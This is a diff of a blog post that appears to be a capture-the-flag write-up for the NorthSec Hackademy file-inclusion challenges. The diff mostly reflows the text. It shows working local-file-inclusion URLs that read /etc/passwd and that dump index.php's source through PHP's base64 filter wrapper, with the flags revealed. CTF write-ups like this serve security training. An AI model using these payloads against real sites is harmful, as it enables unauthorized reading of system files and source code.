lolkatz/github-pages-with-jekyll/_posts/2022-05-28-northsec-hackademy.md

 ## Inclusion 101, 102, 103

 A classic local file inclusion exist on this site.
-The url is: http://chal2.hackademy.ctf/?page=welcome.php
+The URL is:

+http://chal2.hackademy.ctf/?page=welcome.php

 What if I specified /etc/passwd instead of welcome.php?
 Well here is our trainer:
 ````
 ...
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
 trainer:x:1001:1001:Trainer:FLAG-446fd3bcb4a9c08cd5cb25e113aaa1e5,,,,:/bin/false:/sbin/nologin
 ````
 For the next one, you need to look at the source code.
-I tried this URL: http://chal2.hackademy.ctf/?page=php://filter/convert.base64-encode/resource=index.php and it outputted a long base64 string.
-PHP has a nice feature thats allows you to convert a file to base64.
+PHP has a nice feature that allows you to convert a file to base64.
 In our case it will prevent index.php from being interpreted.
+So I tried this URL:

+http://chal2.hackademy.ctf/?page=php://filter/convert.base64-encode/resource=index.php

-Decoding the resulting string you got the source code which included the flag:
+It outputted a long base64 string.
+Decoding the resulting string I got the source code which included the flag:
 ````
 <?php
     #FLAG-8f54c17252eb57ff6cf91f97828f3f54 (2/2)